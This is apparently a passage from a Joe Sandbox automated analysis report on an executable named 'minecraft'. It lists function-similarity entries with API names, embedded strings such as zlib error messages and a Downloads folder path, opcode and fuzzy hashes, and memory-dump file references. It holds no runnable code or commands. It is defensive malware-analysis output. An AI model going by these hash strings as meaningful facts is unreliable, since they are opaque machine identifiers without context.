    • API ID: CloseFreeHandleHeap
    • String ID:
    • API String ID: 1642312469-0
    • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
    • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
    • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
    • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: FileWrite
    • String ID:
    • API String ID: 3934441357-0
    • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
    • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
    • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
    • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Free
    • String ID:
    • API String ID: 3978063606-0
    • Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
    • Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
    • Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
    • Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: CurrentDirectory
    • String ID:
    • API String ID: 1611563598-0
    • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
    • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
    • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
    • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: CreateHeap
    • String ID:
    • API String ID: 10892065-0
    • Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
    • Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
    • Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
    • Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: ExceptionHandlerRemoveVectored
    • String ID:
    • API String ID: 1340492425-0
    • Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
    • Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
    • Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
    • Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocateBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
    • String ID: BUTTON$C$EDIT$P$STATIC$n
    • API String ID: 1420713935-1690119102
    • Opcode ID: 002200ebb1e1213bc04a13eb1c4ef8fb9e0871078b3e41863b1eb0bca815023c
    • Instruction ID: 503d67efbf07ff6f248b06a67c50be69490569a40db1ce31eb7df8f18fb995d6
    • Opcode Fuzzy Hash: 002200ebb1e1213bc04a13eb1c4ef8fb9e0871078b3e41863b1eb0bca815023c
    • Instruction Fuzzy Hash: 59D134B5605B4086EB12DB62F8447AA77A5FB8CBC8F404129AF4A47B79DF7DC4498B00
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Window$ClassDestroyEnableNtdllProc_Unregister
    • String ID:
    • API String ID: 1396861415-0
    • Opcode ID: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
    • Instruction ID: a4636e2d5cbf899b35d7322a6c98c02ffc5b8df7e19630505cb7187d8542c3a3
    • Opcode Fuzzy Hash: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
    • Instruction Fuzzy Hash: 4A210BB4204A5182FB56DB27F8483B923A1E78CBC1F549026FB4A4B7B5DF3DC8859700
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID:
    • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
    • API String ID: 0-2665694366
    • Opcode ID: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
    • Instruction ID: 63a129330255db97eb1aabb126bfc5b4551e8f686405ea2d62c327762663274b
    • Opcode Fuzzy Hash: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
    • Instruction Fuzzy Hash: FB620572A106A48BE799CF25D498BED3BF9F748780F518129FB468B7A0E739C845C740
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID:
    • String ID: $header crc mismatch$unknown compression method$unknown header flags set
    • API String ID: 0-4074041902
    • Opcode ID: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
    • Instruction ID: 440100e0ad3e42c115cce95f3fb78f0a990aae4413b5501bd8dd5ba0711be261
    • Opcode Fuzzy Hash: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
    • Instruction Fuzzy Hash: 7A02B1726007949BEBA78F16C488BAE3BE9FB4CB94F164518EF894B7A0D775C940C740
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID:
    • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
    • API String ID: 0-3255898291
    • Opcode ID: b59c351ebb6019647229452a56868728e5b182fd303493ccc03160f08c7a3aa8
    • Instruction ID: 3f1348f65b8f8bda14ba5cdfa7bf6f02fc8c4dbb68883e69d1ec2b1899c7470d
    • Opcode Fuzzy Hash: b59c351ebb6019647229452a56868728e5b182fd303493ccc03160f08c7a3aa8
    • Instruction Fuzzy Hash: C5D138326186D08BD71A8F3AD8447BD7FA1F3993C4F54811AEB968B791D63DCA4AC700
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID:
    • String ID: incorrect header check$invalid window size$unknown compression method
    • API String ID: 0-1186847913
    • Opcode ID: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
    • Instruction ID: c7f0437dc46e56fef3014f932af091831cb3ca76e565b5a088b3fef6b265a946
    • Opcode Fuzzy Hash: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
    • Instruction Fuzzy Hash: 9391A2726106949BFBA6CF26C584B9E3BA9F70C794F114229EB464BBE1C736D950CB00
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID:
    • String ID: $ $invalid block type
    • API String ID: 0-2056396358
    • Opcode ID: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
    • Instruction ID: 6826abb0ae9e935998ffe99ae2e08a78a36fe9b187ecd4f73c4f7ab9da41e151
    • Opcode Fuzzy Hash: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
    • Instruction Fuzzy Hash: 7161E3B3510B949BE766CF26C8887AD3BE8F708394F554229EB558B7E0D73AC490CB40
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: memcpy
    • String ID:
    • API String ID: 3510742995-0
    • Opcode ID: 1b03f7ef480ea5865ac2d9ef79243ddcad7e3d9da8d43d155ca602e5c9a73022
    • Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
    • Opcode Fuzzy Hash: 1b03f7ef480ea5865ac2d9ef79243ddcad7e3d9da8d43d155ca602e5c9a73022
    • Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 68354d835f18592a3392b19952e0fe910a5dfe6a9023353f29145046c6faf481
    • Instruction ID: 022ba38ea2fc746ee1b0595bfd7f682d53a7df84c20089d95d53e5e85305b389
    • Opcode Fuzzy Hash: 68354d835f18592a3392b19952e0fe910a5dfe6a9023353f29145046c6faf481
    • Instruction Fuzzy Hash: E32283B7F744204BD71DCB69EC52FE836A2B75434C709A02CAA17D3F44EA3DEA158A44
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
    • Instruction ID: f294bca1e54ba5f97cd1887ffa6c8c7d976b4678fb34f7ffe8470b0002a4fcc7
    • Opcode Fuzzy Hash: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
    • Instruction Fuzzy Hash: 7B8150733301749BE7668A2EA514BE93290F3693CEFC56115FB8487B45CA3EB921CB50
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
    • Instruction ID: e67d2bfc1a2697f1f60af7736c02a9787f64ff3490f4c327f028a03746ec3e44
    • Opcode Fuzzy Hash: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
    • Instruction Fuzzy Hash: FE715CB23301749BEB658B2E9514BE93390F36A349FC56105EB855BB81CE3EB921CF50
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
    • Instruction ID: b94fce4af05d2a3b47cf10f4c42de706c870d6d3f1c440dba90fb4ad6b70bb1c
    • Opcode Fuzzy Hash: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
    • Instruction Fuzzy Hash: 3941BB32310640CAFBAA9B1AE020BEE3691E7997C5FD49115DB819FAF0D63BD4058B40
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
    • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
    • API String ID: 217932011-4219398408
    • Opcode ID: baf9e754506da9efa04bb7baef11d081e03a89bf48f902bbef2c1cfc2494dcfa
    • Instruction ID: f53257261a77fa7679be829afa5858120bcd1a05ac071047bacb850080d37645
    • Opcode Fuzzy Hash: baf9e754506da9efa04bb7baef11d081e03a89bf48f902bbef2c1cfc2494dcfa
    • Instruction Fuzzy Hash: F7418D72211B8082EB16EF12E8443EA73A4F78CBC8F544125EB4A477A5EF39C95AC700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: FreeLibrarywcscatwcslen$AddressAllocateHeapLoadProcTaskValuewcscpy
    • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
    • API String ID: 1878685483-287042676
    • Opcode ID: af3ba110e3d0ba57517c83c0fb64a893d7f1b6ff8354fe36c6ead1af46344a34
    • Instruction ID: ffb59ae5301eeda9161766390bd85b6f914ac2b2dd013f36d3426db2d5643a12
    • Opcode Fuzzy Hash: af3ba110e3d0ba57517c83c0fb64a893d7f1b6ff8354fe36c6ead1af46344a34
    • Instruction Fuzzy Hash: A64186B1214A46C2FA27EB57B4947F97291AB8C7D0F540127BB0A0B7F5DEB9C841C611
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: _wcsdupfreewcsncpy$Value
    • String ID:
    • API String ID: 1554701960-0
    • Opcode ID: eae06682ae28bc4f435427b58f7a54a08f3b8b88289e45f38b0b7b827e51cabb
    • Instruction ID: da1d114085ca4aa9233c1495fb0579f216bdf29e57c82a9bb0fca7f891cc91e6
    • Opcode Fuzzy Hash: eae06682ae28bc4f435427b58f7a54a08f3b8b88289e45f38b0b7b827e51cabb
    • Instruction Fuzzy Hash: AE91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapLongProcessVisible
    • String ID:
    • API String ID: 684997728-0
    • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
    • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
    • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
    • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Library$AddressFreeLoadProcSleep
    • String ID: InitOnceExecuteOnce$Kernel32.dll
    • API String ID: 938261879-1339284965
    • Opcode ID: 315e644546469fd2db35d0db39a019d67f841a3b1ec84ab54f403295059e202d
    • Instruction ID: b5645326e5d4f07ede329690aacabb45cf3e43243987f71da7b0cd1098b1f21b
    • Opcode Fuzzy Hash: 315e644546469fd2db35d0db39a019d67f841a3b1ec84ab54f403295059e202d
    • Instruction Fuzzy Hash: B4118F3120874585EB5ADF57A8843E973A0EB8CBD0F488029AB0A0B666EF3AC595C740
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Window$CurrentThread$EnableEnumWindows
    • String ID:
    • API String ID: 2527101397-0
    • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
    • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
    • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
    • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Value$AllocateHeap$Alloc
    • String ID:
    • API String ID: 2511646910-0
    • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
    • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
    • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
    • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: CriticalSection$AllocateHeap$EnterInitializeLeave
    • String ID:
    • API String ID: 2823868979-0
    • Opcode ID: 9401c8691c50f740a847db88c587e37cfc3cc7e6b1d7d2a34aa6e1dd6b61c51d
    • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
    • Opcode Fuzzy Hash: 9401c8691c50f740a847db88c587e37cfc3cc7e6b1d7d2a34aa6e1dd6b61c51d
    • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
    • String ID:
